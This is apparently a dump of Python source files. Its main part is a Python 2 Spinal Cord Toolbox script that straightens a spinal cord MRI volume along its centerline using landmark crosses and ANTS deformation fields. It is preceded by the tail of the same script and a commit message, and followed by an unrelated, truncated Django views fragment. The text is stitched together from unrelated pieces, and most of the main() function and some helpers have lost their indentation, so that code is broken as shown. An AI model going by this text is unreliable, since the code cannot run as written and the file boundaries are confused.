' -p <padding> amount of padding for generating labels. Default='+str(param.padding)+'\n' \
' -f {splines,polynomial} Method used to fit the centerline (or segmentation). Default='+str(param.fitting_method)+'\n' \
' -w {nearestneighbor,trilinear,spline} Final interpolation. Default='+str(param.interpolation_warp)+'\n' \
' -r {0,1} remove temporary files. Default=1. \n' \
' -v {0,1,2} verbose. 0: nothing, 1: txt, 2: txt+fig. Default='+str(param.verbose)+'\n' \
' -h help. Show this message.\n' \
'\n'\
'EXAMPLE:\n' \
' sct_straighten_spinalcord.py -i t2.nii.gz -c centerline.nii.gz\n'
sys.exit(2)
#=======================================================================================================================
# Start program
#=======================================================================================================================
if __name__ == "__main__":
    # initialize parameters
    # NOTE: this rebinds the module-level name "param" from the class to an
    # instance; all other functions read their defaults through this instance
    param = param()
    # call main function
    main()
BUG: small fix
Former-commit-id: c9161091923168996580a3fa58e3977e40dc0c36
Former-commit-id: c67248069510b6fc7c1ba5aa568b62510e5ba32f
#!/usr/bin/env python
## @package sct_straighten_spinalcord
#
# - from spinal cord centerline (as nifti format), estimate deformation field with ANTS.
#
#
# Description about how the function works:
# This program takes as input an anatomic image and the centerline or segmentation of its spinal cord (that you can get
# using sct_get_centerline.py or sct_segmentation_propagation) and returns the anatomic image where the spinal
# cord was straightened.
#
#
# USAGE
# ---------------------------------------------------------------------------------------
# sct_straighten_spinalcord.py -i <data> -c <centerline>
#
# MANDATORY ARGUMENTS
# ---------------------------------------------------------------------------------------
# -i input volume.
# -c centerline (generated with sct_get_centerline).
#
# OPTIONAL ARGUMENTS
# ---------------------------------------------------------------------------------------
#
# -f 'polynomial' or 'splines' fitting default is 'splines'
#
# EXAMPLES
# ---------------------------------------------------------------------------------------
# sct_straighten_spinalcord.py -i t2.nii.gz -c centerline.nii.gz
#
#
# DEPENDENCIES
# ---------------------------------------------------------------------------------------
# EXTERNAL PYTHON PACKAGES
# - nibabel: <http://nipy.sourceforge.net/nibabel/>
# - numpy: <http://www.numpy.org>
# - sympy : <http://sympy.org/fr/index.html>
# EXTERNAL SOFTWARE
# - FSL: <http://fsl.fmrib.ox.ac.uk/fsl/>
# - ANTS
#
#
# ---------------------------------------------------------------------------------------
# Copyright (c) 2013 NeuroPoly, Polytechnique Montreal <www.neuro.polymtl.ca>
# Authors: Julien Cohen-Adad, Geoffrey Leveque, Julien Touati
# Modified: 2014-07-05 by jcohen
#
# License: see the LICENSE.TXT
#=======================================================================================================================
# TODO: calculate backward transformation from forward instead of estimating it
# TODO: fix bug of label creation when using splines (2014-06-05: error with data from Falk with small FOV along z)
# TODO: generate cross at both edge (top and bottom) and populate in between --> this will ensure better quality of the warping field.
# TODO: check if there is an overlap of labels, in case of high curvature and high density of cross along z.
# TODO: convert gap definition to mm (more intuitive than voxel)
# 2014-06-06: corrected bug related to small FOV volumes. Solution: reduced spline order (3), computation of a lot of points (1000)
## Create a structure to pass important user parameters to the main function
class param:
    """Container for the user-tunable parameters of the straightening script."""
    def __init__(self):
        # Populate every parameter with its default value.
        self.debug = 1
        # centerline fitting
        self.deg_poly = 10                  # maximum degree of polynomial function for fitting centerline
        self.fitting_method = 'splines'     # splines | polynomial
        # landmark generation
        self.gapxy = 20                     # size of cross in x and y direction for the landmarks
        self.gapz = 15                      # gap between landmarks along z
        self.padding = 30                   # pad input volume so landmarks pushed outside the FOV by the cord curvature are kept
        # output
        self.interpolation_warp = 'spline'  # final interpolation method
        self.remove_temp_files = 1          # 1: remove temporary files at the end
        self.verbose = 1                    # 0: nothing, 1: txt, 2: txt+fig
# check if needed Python libraries are already installed or not
import os
import getopt
import time
import commands
import sys
import sct_utils as sct
from sct_utils import fsloutput
from sct_nurbs import NURBS
import nibabel
import numpy
from scipy import interpolate # TODO: check if used
from sympy.solvers import solve
from sympy import Symbol
from scipy import ndimage
# check if dependent external software (FSL, ANTS) is installed; abort early
# with a clear message otherwise
sct.check_if_installed('flirt -help','FSL')
sct.check_if_installed('WarpImageMultiTransform -h','ANTS')
#=======================================================================================================================
# main
#=======================================================================================================================
def main():
# Initialization
fname_anat = ''
fname_centerline = ''
gapxy = param.gapxy
gapz = param.gapz
padding = param.padding
centerline_fitting = param.fitting_method
remove_temp_files = param.remove_temp_files
verbose = param.verbose
interpolation_warp = param.interpolation_warp
# get path of the toolbox
status, path_sct = commands.getstatusoutput('echo $SCT_DIR')
print path_sct
# extract path of the script
path_script = os.path.dirname(__file__)+'/'
# Parameters for debug mode
if param.debug == 1:
print '\n*** WARNING: DEBUG MODE ON ***\n'
#fname_anat = path_sct+'/testing/data/11shortFOV/t1_cropped_short.nii.gz'
#fname_centerline = path_sct+'/testing/data/11shortFOV/spine_cropped_short.nii.gz'
# fname_anat = '/Users/julien/code/spinalcordtoolbox/testing/data/errsm_23/t2/tmp.140706150926/data_up.nii.gz'
# fname_centerline = '/Users/julien/code/spinalcordtoolbox/testing/data/errsm_23/t2/tmp.140706150926/data_up.nii.gz'
fname_anat = '/Users/julien/code/spinalcordtoolbox/testing/data/errsm_23/t2/tmp.140706150926/data.nii'
fname_centerline = '/Users/julien/code/spinalcordtoolbox/testing/data/errsm_23/t2/tmp.140706150926/data.nii'
remove_temp_files = 0
centerline_fitting = 'splines'
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
verbose = 2
# Check input param
try:
opts, args = getopt.getopt(sys.argv[1:],'hi:c:r:w:f:v:')
except getopt.GetoptError as err:
print str(err)
usage()
for opt, arg in opts:
if opt == '-h':
usage()
elif opt in ('-i'):
fname_anat = arg
elif opt in ('-c'):
fname_centerline = arg
elif opt in ('-r'):
remove_temp_files = int(arg)
elif opt in ('-w'):
interpolation_warp = str(arg)
elif opt in ('-f'):
centerline_fitting = str(arg)
elif opt in ('-v'):
verbose = int(arg)
# display usage if a mandatory argument is not provided
if fname_anat == '' or fname_centerline == '':
usage()
# Display usage if optional arguments are not correctly provided
if centerline_fitting == '':
centerline_fitting = 'splines'
elif not centerline_fitting == '' and not centerline_fitting == 'splines' and not centerline_fitting == 'polynomial':
print '\n \n -f argument is not valid \n \n'
usage()
# check existence of input files
sct.check_file_exist(fname_anat)
sct.check_file_exist(fname_centerline)
# check interp method
if interpolation_warp == 'spline':
interpolation_warp_ants = '--use-BSpline'
elif interpolation_warp == 'trilinear':
interpolation_warp_ants = ''
elif interpolation_warp == 'nearestneighbor':
interpolation_warp_ants = '--use-NN'
else:
print '\WARNING: Interpolation method not recognized. Using: '+param.interpolation_warp
interpolation_warp_ants = '--use-BSpline'
# Display arguments
print '\nCheck input arguments...'
print ' Input volume ...................... '+fname_anat
print ' Centerline ........................ '+fname_centerline
print ' Centerline fitting option ......... '+centerline_fitting
print ' Final interpolation ............... '+interpolation_warp
print ' Verbose ........................... '+str(verbose)
print ''
# if verbose 2, import matplotlib
if verbose == 2:
import matplotlib.pyplot as plt
# Extract path/file/extension
path_anat, file_anat, ext_anat = sct.extract_fname(fname_anat)
path_centerline, file_centerline, ext_centerline = sct.extract_fname(fname_centerline)
# create temporary folder
path_tmp = 'tmp.'+time.strftime("%y%m%d%H%M%S")
sct.run('mkdir '+path_tmp)
# copy files into tmp folder
sct.run('cp '+fname_anat+' '+path_tmp)
sct.run('cp '+fname_centerline+' '+path_tmp)
# go to tmp folder
os.chdir(path_tmp)
# Open centerline
#==========================================================================================
# Change orientation of the input centerline into RPI
print '\nOrient centerline to RPI orientation...'
fname_centerline_orient = 'tmp.centerline_rpi' + ext_centerline
sct.run('sct_orientation -i ' + file_centerline + ext_centerline + ' -o ' + fname_centerline_orient + ' -orientation RPI')
print '\nGet dimensions of input centerline...'
nx, ny, nz, nt, px, py, pz, pt = sct.get_dimension(fname_centerline_orient)
print '.. matrix size: '+str(nx)+' x '+str(ny)+' x '+str(nz)
print '.. voxel size: '+str(px)+'mm x '+str(py)+'mm x '+str(pz)+'mm'
print '\nOpen centerline volume...'
file = nibabel.load(fname_centerline_orient)
data = file.get_data()
# loop across z and associate x,y coordinate with the point having maximum intensity
x_centerline = [0 for iz in range(0, nz, 1)]
y_centerline = [0 for iz in range(0, nz, 1)]
z_centerline = [iz for iz in range(0, nz, 1)]
x_centerline_deriv = [0 for iz in range(0, nz, 1)]
y_centerline_deriv = [0 for iz in range(0, nz, 1)]
z_centerline_deriv = [0 for iz in range(0, nz, 1)]
# Two possible scenario:
# 1. the centerline is probabilistic: each slice contains voxels with the probability of containing the centerline [0:...:1]
# We only take the maximum value of the image to aproximate the centerline.
# 2. The centerline/segmentation image contains many pixels per slice with values {0,1}.
# We take all the points and approximate the centerline on all these points.
x_seg_start, y_seg_start = (data[:,:,0]>0).nonzero()
x_seg_end, y_seg_end = (data[:,:,-1]>0).nonzero()
# check if centerline covers all the image
if len(x_seg_start)==0 or len(x_seg_end)==0:
print '\nERROR: centerline/segmentation must cover all "z" slices of the input image.\n' \
'To solve the problem, you need to crop the input image (you can use \'sct_crop_image\') and generate one' \
'more time the spinal cord centerline/segmentation from this cropped image.\n'
usage()
# X, Y, Z = ((data<1)*(data>0)).nonzero() # X is empty if binary image
# if (len(X) > 0): # Scenario 1
# for iz in range(0, nz, 1):
# x_centerline[iz], y_centerline[iz] = numpy.unravel_index(data[:,:,iz].argmax(), data[:,:,iz].shape)
# else: # Scenario 2
# for iz in range(0, nz, 1):
# x_seg, y_seg = (data[:,:,iz]>0).nonzero()
# x_centerline[iz] = numpy.mean(x_seg)
# y_centerline[iz] = numpy.mean(y_seg)
# # TODO: find a way to do the previous loop with this, which is more neat:
# # [numpy.unravel_index(data[:,:,iz].argmax(), data[:,:,iz].shape) for iz in range(0,nz,1)]
# get center of mass of the centerline/segmentation
print '\nGet center of mass of the centerline/segmentation...'
for iz in range(0, nz, 1):
x_centerline[iz], y_centerline[iz] = ndimage.measurements.center_of_mass(numpy.array(data[:,:,iz]))
# clear variable
del data
# Fit the centerline points with the kind of curve given as argument of the script and return the new fitted coordinates
if centerline_fitting == 'splines':
x_centerline_fit, y_centerline_fit, x_centerline_deriv, y_centerline_deriv, z_centerline_deriv = b_spline_centerline(x_centerline,y_centerline,z_centerline)
elif centerline_fitting == 'polynomial':
x_centerline_fit, y_centerline_fit, polyx, polyy = polynome_centerline(x_centerline,y_centerline,z_centerline)
if verbose == 2:
# plot centerline
ax = plt.subplot(1,2,1)
plt.plot(x_centerline, z_centerline, 'b:', label='centerline')
plt.plot(x_centerline_fit, z_centerline, 'r-', label='fit')
plt.xlabel('x')
plt.ylabel('z')
ax = plt.subplot(1,2,2)
plt.plot(y_centerline, z_centerline, 'b:', label='centerline')
plt.plot(y_centerline_fit, z_centerline, 'r-', label='fit')
plt.xlabel('y')
plt.ylabel('z')
handles, labels = ax.get_legend_handles_labels()
ax.legend(handles, labels)
plt.show()
# Get coordinates of landmarks along curved centerline
#==========================================================================================
print '\nGet coordinates of landmarks along curved centerline...'
# landmarks are created along the curved centerline every z=gapz. They consist of a "cross" of size gapx and gapy.
# find derivative of polynomial
step_z = round(nz/gapz)
#iz_curved = [i for i in range (0, nz, gapz)]
iz_curved = [i*step_z for i in range (0, gapz)]
iz_curved.append(nz-1)
#print iz_curved, len(iz_curved)
n_iz_curved = len(iz_curved)
#print n_iz_curved
landmark_curved = [ [ [ 0 for i in range(0,3)] for i in range(0,5) ] for i in iz_curved ]
# print x_centerline_deriv,len(x_centerline_deriv)
# landmark[a][b][c]
# a: index along z. E.g., the first cross with have index=0, the next index=1, and so on...
# b: index of element on the cross. I.e., 0: center of the cross, 1: +x, 2 -x, 3: +y, 4: -y
# c: dimension, i.e., 0: x, 1: y, 2: z
# loop across index, which corresponds to iz (points along the centerline)
if centerline_fitting=='polynomial':
for index in range(0, n_iz_curved, 1):
# set coordinates for landmark at the center of the cross
landmark_curved[index][0][0], landmark_curved[index][0][1], landmark_curved[index][0][2] = x_centerline_fit[iz_curved[index]], y_centerline_fit[iz_curved[index]], iz_curved[index]
# set x and z coordinates for landmarks +x and -x
landmark_curved[index][1][2], landmark_curved[index][1][0], landmark_curved[index][2][2], landmark_curved[index][2][0] = get_points_perpendicular_to_curve(polyx, polyx.deriv(), iz_curved[index], gapxy)
# set y coordinate to y_centerline_fit[iz] for elements 1 and 2 of the cross
for i in range(1,3):
landmark_curved[index][i][1] = y_centerline_fit[iz_curved[index]]
# set coordinates for landmarks +y and -y. Here, x coordinate is 0 (already initialized).
landmark_curved[index][3][2], landmark_curved[index][3][1], landmark_curved[index][4][2], landmark_curved[index][4][1] = get_points_perpendicular_to_curve(polyy, polyy.deriv(), iz_curved[index], gapxy)
# set x coordinate to x_centerline_fit[iz] for elements 3 and 4 of the cross
for i in range(3,5):
landmark_curved[index][i][0] = x_centerline_fit[iz_curved[index]]
elif centerline_fitting=='splines':
for index in range(0, n_iz_curved, 1):
# calculate d (ax+by+cz+d=0)
# print iz_curved[index]
a=x_centerline_deriv[iz_curved[index]]
b=y_centerline_deriv[iz_curved[index]]
c=z_centerline_deriv[iz_curved[index]]
x=x_centerline_fit[iz_curved[index]]
y=y_centerline_fit[iz_curved[index]]
z=iz_curved[index]
d=-(a*x+b*y+c*z)
#print a,b,c,d,x,y,z
# set coordinates for landmark at the center of the cross
landmark_curved[index][0][0], landmark_curved[index][0][1], landmark_curved[index][0][2] = x_centerline_fit[iz_curved[index]], y_centerline_fit[iz_curved[index]], iz_curved[index]
# set y coordinate to y_centerline_fit[iz] for elements 1 and 2 of the cross
for i in range(1,3):
landmark_curved[index][i][1] = y_centerline_fit[iz_curved[index]]
# set x and z coordinates for landmarks +x and -x, forcing de landmark to be in the orthogonal plan and the distance landmark/curve to be gapxy
x_n=Symbol('x_n')
landmark_curved[index][2][0],landmark_curved[index][1][0]=solve((x_n-x)**2+((-1/c)*(a*x_n+b*y+d)-z)**2-gapxy**2,x_n) #x for -x and +x
landmark_curved[index][1][2]=(-1/c)*(a*landmark_curved[index][1][0]+b*y+d) #z for +x
landmark_curved[index][2][2]=(-1/c)*(a*landmark_curved[index][2][0]+b*y+d) #z for -x
# set x coordinate to x_centerline_fit[iz] for elements 3 and 4 of the cross
for i in range(3,5):
landmark_curved[index][i][0] = x_centerline_fit[iz_curved[index]]
# set coordinates for landmarks +y and -y. Here, x coordinate is 0 (already initialized).
y_n=Symbol('y_n')
landmark_curved[index][4][1],landmark_curved[index][3][1]=solve((y_n-y)**2+((-1/c)*(a*x+b*y_n+d)-z)**2-gapxy**2,y_n) #y for -y and +y
landmark_curved[index][3][2]=(-1/c)*(a*x+b*landmark_curved[index][3][1]+d)#z for +y
landmark_curved[index][4][2]=(-1/c)*(a*x+b*landmark_curved[index][4][1]+d)#z for -y
# #display
# fig = plt.figure()
# ax = fig.add_subplot(111, projection='3d')
# ax.plot(x_centerline_fit, y_centerline_fit,z_centerline, 'g')
# ax.plot(x_centerline, y_centerline,z_centerline, 'r')
# ax.plot([landmark_curved[i][j][0] for i in range(0, n_iz_curved) for j in range(0, 5)], \
# [landmark_curved[i][j][1] for i in range(0, n_iz_curved) for j in range(0, 5)], \
# [landmark_curved[i][j][2] for i in range(0, n_iz_curved) for j in range(0, 5)], '.')
# ax.set_xlabel('x')
# ax.set_ylabel('y')
# ax.set_zlabel('z')
# plt.show()
# Get coordinates of landmarks along straight centerline
#==========================================================================================
print '\nGet coordinates of landmarks along straight centerline...'
landmark_straight = [ [ [ 0 for i in range(0,3)] for i in range (0,5) ] for i in iz_curved ] # same structure as landmark_curved
# calculate the z indices corresponding to the Euclidean distance between two consecutive points on the curved centerline (approximation curve --> line)
iz_straight = [0 for i in range (0,gapz+1)]
#print iz_straight,len(iz_straight)
for index in range(1, n_iz_curved, 1):
# compute vector between two consecutive points on the curved centerline
vector_centerline = [x_centerline_fit[iz_curved[index]] - x_centerline_fit[iz_curved[index-1]], \
y_centerline_fit[iz_curved[index]] - y_centerline_fit[iz_curved[index-1]], \
iz_curved[index] - iz_curved[index-1]]
# compute norm of this vector
norm_vector_centerline = numpy.linalg.norm(vector_centerline, ord=2)
# round to closest integer value
norm_vector_centerline_rounded = int(round(norm_vector_centerline,0))
# assign this value to the current z-coordinate on the straight centerline
iz_straight[index] = iz_straight[index-1] + norm_vector_centerline_rounded
# initialize x0 and y0 to be at the center of the FOV
x0 = int(round(nx/2))
y0 = int(round(ny/2))
for index in range(0, n_iz_curved, 1):
# set coordinates for landmark at the center of the cross
landmark_straight[index][0][0], landmark_straight[index][0][1], landmark_straight[index][0][2] = x0, y0, iz_straight[index]
# set x, y and z coordinates for landmarks +x
landmark_straight[index][1][0], landmark_straight[index][1][1], landmark_straight[index][1][2] = x0 + gapxy, y0, iz_straight[index]
# set x, y and z coordinates for landmarks -x
landmark_straight[index][2][0], landmark_straight[index][2][1], landmark_straight[index][2][2] = x0-gapxy, y0, iz_straight[index]
# set x, y and z coordinates for landmarks +y
landmark_straight[index][3][0], landmark_straight[index][3][1], landmark_straight[index][3][2] = x0, y0+gapxy, iz_straight[index]
# set x, y and z coordinates for landmarks -y
landmark_straight[index][4][0], landmark_straight[index][4][1], landmark_straight[index][4][2] = x0, y0-gapxy, iz_straight[index]
# # display
# fig = plt.figure()
# ax = fig.add_subplot(111, projection='3d')
# #ax.plot(x_centerline_fit, y_centerline_fit,z_centerline, 'r')
# ax.plot([landmark_straight[i][j][0] for i in range(0, n_iz_curved) for j in range(0, 5)], \
# [landmark_straight[i][j][1] for i in range(0, n_iz_curved) for j in range(0, 5)], \
# [landmark_straight[i][j][2] for i in range(0, n_iz_curved) for j in range(0, 5)], '.')
# ax.set_xlabel('x')
# ax.set_ylabel('y')
# ax.set_zlabel('z')
# plt.show()
#
# Create NIFTI volumes with landmarks
#==========================================================================================
# Pad input volume to deal with the fact that some landmarks on the curved centerline might be outside the FOV
# N.B. IT IS VERY IMPORTANT TO PAD ALSO ALONG X and Y, OTHERWISE SOME LANDMARKS MIGHT GET OUT OF THE FOV!!!
print '\nPad input volume to deal with the fact that some landmarks on the curved centerline might be outside the FOV...'
sct.run('c3d '+fname_centerline_orient+' -pad '+str(padding)+'x'+str(padding)+'x'+str(padding)+'vox '+str(padding)+'x'+str(padding)+'x'+str(padding)+'vox 0 -o tmp.centerline_pad.nii.gz')
# TODO: don't pad input volume: no need for that! instead, try to increase size of hdr when saving landmarks.
# Open padded centerline for reading
print '\nOpen padded centerline for reading...'
file = nibabel.load('tmp.centerline_pad.nii.gz')
data = file.get_data()
hdr = file.get_header()
# Create volumes containing curved and straight landmarks
data_curved_landmarks = data * 0
data_straight_landmarks = data * 0
# initialize landmark value
landmark_value = 1
# Loop across cross index
for index in range(0, n_iz_curved, 1):
# loop across cross element index
for i_element in range(0, 5, 1):
# get x, y and z coordinates of curved landmark (rounded to closest integer)
x, y, z = int(round(landmark_curved[index][i_element][0])), int(round(landmark_curved[index][i_element][1])), int(round(landmark_curved[index][i_element][2]))
# attribute landmark_value to the voxel and its neighbours
data_curved_landmarks[x+padding-1:x+padding+2, y+padding-1:y+padding+2, z+padding-1:z+padding+2] = landmark_value
# get x, y and z coordinates of straight landmark (rounded to closest integer)
x, y, z = int(round(landmark_straight[index][i_element][0])), int(round(landmark_straight[index][i_element][1])), int(round(landmark_straight[index][i_element][2]))
# attribute landmark_value to the voxel and its neighbours
data_straight_landmarks[x+padding-1:x+padding+2, y+padding-1:y+padding+2, z+padding-1:z+padding+2] = landmark_value
# increment landmark value
landmark_value = landmark_value + 1
# Write NIFTI volumes
hdr.set_data_dtype('uint32') # set imagetype to uint8 #TODO: maybe use int32
print '\nWrite NIFTI volumes...'
img = nibabel.Nifti1Image(data_curved_landmarks, None, hdr)
nibabel.save(img, 'tmp.landmarks_curved.nii.gz')
print '.. File created: tmp.landmarks_curved.nii.gz'
img = nibabel.Nifti1Image(data_straight_landmarks, None, hdr)
nibabel.save(img, 'tmp.landmarks_straight.nii.gz')
print '.. File created: tmp.landmarks_straight.nii.gz'
# Estimate deformation field by pairing landmarks
#==========================================================================================
# Dilate landmarks (because nearest neighbour interpolation will be later used, therefore some landmarks may "disapear" if they are single points)
#print '\nDilate landmarks...'
#sct.run(fsloutput+'fslmaths tmp.landmarks_curved.nii -kernel box 3x3x3 -dilD tmp.landmarks_curved_dilated -odt short')
#sct.run(fsloutput+'fslmaths tmp.landmarks_straight.nii -kernel box 3x3x3 -dilD tmp.landmarks_straight_dilated -odt short')
# Estimate rigid transformation
print '\nEstimate rigid transformation between paired landmarks...'
sct.run('ANTSUseLandmarkImagesToGetAffineTransform tmp.landmarks_straight.nii.gz tmp.landmarks_curved.nii.gz rigid tmp.curve2straight_rigid.txt')
# Apply rigid transformation
print '\nApply rigid transformation to curved landmarks...'
sct.run('WarpImageMultiTransform 3 tmp.landmarks_curved.nii.gz tmp.landmarks_curved_rigid.nii.gz -R tmp.landmarks_straight.nii.gz tmp.curve2straight_rigid.txt --use-NN')
# Estimate b-spline transformation curve --> straight
print '\nEstimate b-spline transformation: curve --> straight...'
sct.run('ANTSUseLandmarkImagesToGetBSplineDisplacementField tmp.landmarks_straight.nii.gz tmp.landmarks_curved_rigid.nii.gz tmp.warp_curve2straight.nii.gz 5x5x5 3 2 0')
# Concatenate rigid and non-linear transformations...
print '\nConcatenate rigid and non-linear transformations...'
#sct.run('ComposeMultiTransform 3 tmp.warp_rigid.nii -R tmp.landmarks_straight.nii tmp.warp.nii tmp.curve2straight_rigid.txt')
# TODO: use sct.run() when output from the following command will be different from 0 (currently there seem to be a bug)
cmd = 'ComposeMultiTransform 3 tmp.curve2straight.nii.gz -R tmp.landmarks_straight.nii.gz tmp.warp_curve2straight.nii.gz tmp.curve2straight_rigid.txt'
print('>> '+cmd)
commands.getstatusoutput(cmd)
# Estimate b-spline transformation straight --> curve
# TODO: invert warping field instead of estimating a new one
print '\nEstimate b-spline transformation: straight --> curve...'
sct.run('ANTSUseLandmarkImagesToGetBSplineDisplacementField tmp.landmarks_curved_rigid.nii.gz tmp.landmarks_straight.nii.gz tmp.warp_straight2curve.nii.gz 5x5x5 3 2 0')
# Concatenate rigid and non-linear transformations...
print '\nConcatenate rigid and non-linear transformations...'
#sct.run('ComposeMultiTransform 3 tmp.warp_rigid.nii -R tmp.landmarks_straight.nii tmp.warp.nii tmp.curve2straight_rigid.txt')
# TODO: use sct.run() when output from the following command will be different from 0 (currently there seem to be a bug)
cmd = 'ComposeMultiTransform 3 tmp.straight2curve.nii.gz -R tmp.landmarks_straight.nii.gz -i tmp.curve2straight_rigid.txt tmp.warp_straight2curve.nii.gz'
print('>> '+cmd)
commands.getstatusoutput(cmd)
#print '\nPad input image...'
#sct.run('c3d '+fname_anat+' -pad '+str(padz)+'x'+str(padz)+'x'+str(padz)+'vox '+str(padz)+'x'+str(padz)+'x'+str(padz)+'vox 0 -o tmp.anat_pad.nii')
# Unpad landmarks...
# THIS WAS REMOVED ON 2014-06-03 because the output data was cropped at the edge, which caused landmarks to sometimes disappear
# print '\nUnpad landmarks...'
# sct.run('fslroi tmp.landmarks_straight.nii.gz tmp.landmarks_straight_crop.nii.gz '+str(padding)+' '+str(nx)+' '+str(padding)+' '+str(ny)+' '+str(padding)+' '+str(nz))
# Apply deformation to input image
print '\nApply transformation to input image...'
sct.run('WarpImageMultiTransform 3 '+file_anat+ext_anat+' tmp.anat_rigid_warp.nii.gz -R tmp.landmarks_straight.nii.gz '+interpolation_warp+ ' tmp.curve2straight.nii.gz')
# sct.run('WarpImageMultiTransform 3 '+fname_anat+' tmp.anat_rigid_warp.nii.gz -R tmp.landmarks_straight_crop.nii.gz '+interpolation_warp+ ' tmp.curve2straight.nii.gz')
# come back to parent folder
os.chdir('..')
# Generate output file (in current folder)
# TODO: do not uncompress the warping field, it is too time consuming!
print '\nGenerate output file (in current folder)...'
sct.generate_output_file(path_tmp+'/tmp.curve2straight.nii.gz','','warp_curve2straight',ext_anat) # warping field
sct.generate_output_file(path_tmp+'/tmp.straight2curve.nii.gz','','warp_straight2curve',ext_anat) # warping field
sct.generate_output_file(path_tmp+'/tmp.anat_rigid_warp.nii.gz','',file_anat+'_straight',ext_anat) # straightened anatomic
# Remove temporary files
if remove_temp_files == 1:
print('\nRemove temporary files...')
sct.run('rm -rf '+path_tmp)
print '\nDone!\n'
#=======================================================================================================================
# get_points_perpendicular_to_curve
#=======================================================================================================================
# output: x1, y1, x2, y2
def get_points_perpendicular_to_curve(poly, dpoly, x, gap):
    """Return two points at distance *gap* from the curve, on the line
    perpendicular to the curve's tangent at abscissa *x*.

    poly  : callable giving the curve ordinate, y = poly(x)
    dpoly : callable giving the curve derivative dy/dx at x
    gap   : distance between the curve and each returned point
    Returns (x1, y1, x2, y2), one point on each side of the curve.
    """
    # get y: ordinate that intersects the curve and the line
    y = poly(x)
    if dpoly(x) == 0:
        # BUG FIX: this case used to print a TODO and then crash with a
        # NameError on 'a'. A horizontal tangent means the perpendicular line
        # is vertical, so the two points lie directly above and below the
        # curve (this is the limit of the general formula as dpoly(x) -> 0).
        return x, y + gap, x, y - gap
    # slope of the line perpendicular to the tangent of the curve at x
    a = -1/dpoly(x)
    # convert slope to radian
    a_rad = numpy.arctan(a)
    # get coordinates of the two points on the line at a distance "gap" from the curve
    x1 = x + ( gap * numpy.cos(a_rad) * sct.sign(a_rad) )
    y1 = y + ( gap * numpy.sin(a_rad) * sct.sign(a_rad) )
    x2 = x - ( gap * numpy.cos(a_rad) * sct.sign(a_rad) )
    y2 = y - ( gap * numpy.sin(a_rad) * sct.sign(a_rad) )
    return x1, y1, x2, y2
#=======================================================================================================================
# B-Spline fitting
#=======================================================================================================================
def b_spline_centerline(x_centerline,y_centerline,z_centerline):
"""Give a better fitting of the centerline than the method 'spline_centerline' using b-splines"""
print '\nFit centerline using B-spline approximation'
points = [[x_centerline[n], y_centerline[n], z_centerline[n]] for n in range(len(x_centerline))]
nurbs = NURBS(3, 3000, points) # BE very careful with the spline order that you choose : if order is too high ( > 4 or 5) you need to set a higher number of Control Points (cf sct_nurbs ). For the third argument (number of points), give at least len(z_centerline)+500 or higher
P = nurbs.getCourbe3D()
x_centerline_fit = P[0]
y_centerline_fit = P[1]
Q = nurbs.getCourbe3D_deriv()
x_centerline_deriv = Q[0]
y_centerline_deriv = Q[1]
z_centerline_deriv = Q[2]
return x_centerline_fit, y_centerline_fit, x_centerline_deriv, y_centerline_deriv, z_centerline_deriv
#=======================================================================================================================
# Polynomial fitting
#=======================================================================================================================
def polynome_centerline(x_centerline,y_centerline,z_centerline):
"""Fit polynomial function through centerline"""
# Fit centerline in the Z-X plane using polynomial function
print '\nFit centerline in the Z-X plane using polynomial function...'
coeffsx = numpy.polyfit(z_centerline, x_centerline, deg=param.deg_poly)
polyx = numpy.poly1d(coeffsx)
x_centerline_fit = numpy.polyval(polyx, z_centerline)
#Fit centerline in the Z-Y plane using polynomial function
print '\nFit centerline in the Z-Y plane using polynomial function...'
coeffsy = numpy.polyfit(z_centerline, y_centerline, deg=param.deg_poly)
polyy = numpy.poly1d(coeffsy)
y_centerline_fit = numpy.polyval(polyy, z_centerline)
return x_centerline_fit,y_centerline_fit,polyx,polyy
#=======================================================================================================================
# usage
#=======================================================================================================================
def usage():
    """Print the command-line help message and exit with status 2."""
    print '\n' \
        ''+os.path.basename(__file__)+'\n' \
        '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n' \
        'Part of the Spinal Cord Toolbox <https://sourceforge.net/projects/spinalcordtoolbox>\n' \
        '\n'\
        'DESCRIPTION\n' \
        ' This function straightens the spinal cord using its centerline (or segmentation).\n' \
        '\n'\
        'USAGE\n' \
        ' '+os.path.basename(__file__)+' -i <data> -c <centerline>\n' \
        '\n'\
        'MANDATORY ARGUMENTS\n' \
        ' -i input volume.\n' \
        ' -c centerline or segmentation. Centerline must cover each "z" slices.\n' \
        '\n'\
        'OPTIONAL ARGUMENTS\n' \
        ' -p <padding> amount of padding for generating labels. Default='+str(param.padding)+'\n' \
        ' -f {splines,polynomial} Method used to fit the centerline (or segmentation). Default='+str(param.fitting_method)+'\n' \
        ' -w {nearestneighbor,trilinear,spline} Final interpolation. Default='+str(param.interpolation_warp)+'\n' \
        ' -r {0,1} remove temporary files. Default='+str(param.remove_temp_files)+'\n' \
        ' -v {0,1,2} verbose. 0: nothing, 1: txt, 2: txt+fig. Default='+str(param.verbose)+'\n' \
        ' -h help. Show this message.\n' \
        '\n'\
        'EXAMPLE:\n' \
        ' sct_straighten_spinalcord.py -i t2.nii.gz -c centerline.nii.gz\n'
    sys.exit(2)
#=======================================================================================================================
# Start program
#=======================================================================================================================
if __name__ == "__main__":
    # initialize parameters
    # NOTE: this rebinds the module-level name "param" from the class to an
    # instance; all other functions read their defaults through this instance
    param = param()
    # call main function
    main()
|
from django.conf import settings
from django.http.response import Http404
from django.shortcuts import render_to_response, get_object_or_404
from django.utils.decorators import method_decorator
from django.views.generic import CreateView, DetailView, UpdateView
from .models import SoftwareCollection
from .forms import CreateForm, UpdateForm
from django.template import RequestContext
from tagging.models import Tag
from django.core.exceptions import PermissionDenied
from django.contrib.auth.decorators import login_required
from django.contrib.auth import get_user_model
def _list(request, template, queryset, dictionary, **kwargs):
    """Render *template*, adding the filtered queryset to the context
    under the key ``collections``."""
    # TODO add filtering
    filters = {}
    dictionary['collections'] = queryset.filter(**filters)
    return render_to_response(template, dictionary,
                              context_instance=RequestContext(request))
def list_all(request, **kwargs):
    """Show every software collection."""
    return _list(request, 'scls/list_all.html',
                 SoftwareCollection.objects, {}, **kwargs)
@login_required
def list_my(request, **kwargs):
    """Show the collections maintained by the authenticated user."""
    return _list(request, 'scls/list_my.html',
                 request.user.softwarecollection_set, {}, **kwargs)
def list_user(request, username, **kwargs):
    """Show the collections of the user named *username* (404 if unknown)."""
    User = get_user_model()
